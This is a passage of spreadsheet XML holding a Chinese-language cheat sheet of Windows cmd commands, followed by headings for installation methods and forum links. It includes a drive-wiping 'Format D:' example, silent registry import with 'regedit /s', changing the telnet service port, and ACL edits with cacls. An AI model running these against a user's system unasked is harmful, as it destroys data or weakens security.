        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NTFS ,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>例：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Format D: /FS:NTFS</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">md </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>目录名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>创建目录</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">replace </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>源文件</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要替换文件的目录</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>替换文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ren </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>原文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重命名文件名</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">tree </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以树形结构显示出目录，用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">-f </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将列出第个文件夹中文件名称</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">type </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示文本文件的内容</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">more </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逐屏显示输出文件</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">doskey </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要锁定的命令＝字符</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">doskey </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要解锁命令</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">= </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提供的锁定命令</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编辑命令行，重新调用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>win2k</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令，并创建宏</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。如：锁定</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>dir</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>doskey dir=entsky (</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不能用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>doskey dir=dir)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>；解锁：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>doskey dir=</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">taskmgr </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调出任务管理器</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">chkdsk /F D: </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查磁盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>D</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>并显示状态报告；加参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/f</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>并修复磁盘上的错误</t>
    </r>
  </si>
  <si>
    <r>
      <t>tlntadmn telnt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>admn,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>tlntadmn</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，再选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就可以更改</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>telnet</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务默认端口</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>23</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为其它任何端口</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">exit </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>退出</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序或目前，用参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>则是退出当前批处理脚本而不是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd.exe</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">path </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>路径</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>\</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可执行文件的文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为可执行文件设置一个路径。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">cmd </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>win2K</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令解释窗口。参数：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/eff</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/en </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关闭、开启命令扩展；更我详细说明见</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd /?</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">regedit /s </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注册表文件名导入注册表；参数</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/S</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>指安静模式导入，无任何提示；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">regedit /e </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注册表文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导出注册表</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">cacls </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数显示或修改文件访问控制列表（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ACL</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）——针对</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NTFS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格式时。参数：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/D </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设定拒绝某用户访问；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/P </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">:perm </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>替换指定用户的访问权限；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">/G </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">:perm </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>赋予指定用户访问权限；</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">Perm </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可以是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">: N </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">R </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>读取，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> W </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>写入，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> C </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>更改</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>写入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">F </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>完全控制；例：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">cacls D:\test.txt /D pub </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设定</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>d:\test.txt</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拒绝</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>pub</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户访问。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">cacls </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文件名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看文件的访问用户权限列表</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">REM </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本内容</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在批处理文件中添加注解</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">netsh </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>查看或更改本地网络配置情况</t>
    </r>
  </si>
  <si>
    <r>
      <t>常用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网络命令的用法</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>常用cmd网络命令的用法</t>
  </si>
  <si>
    <t>常用cmd网络命令的用法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、光盘安装：</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">DOS </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下硬盘安装：</t>
    </r>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">PE </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下硬盘安装：</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>论坛详细教程地址：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>http://bbs.ylmf.com/read.php?tid=103085</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>http://bbs.ylmf.com/read.php?tid=102286</t>
    </r>
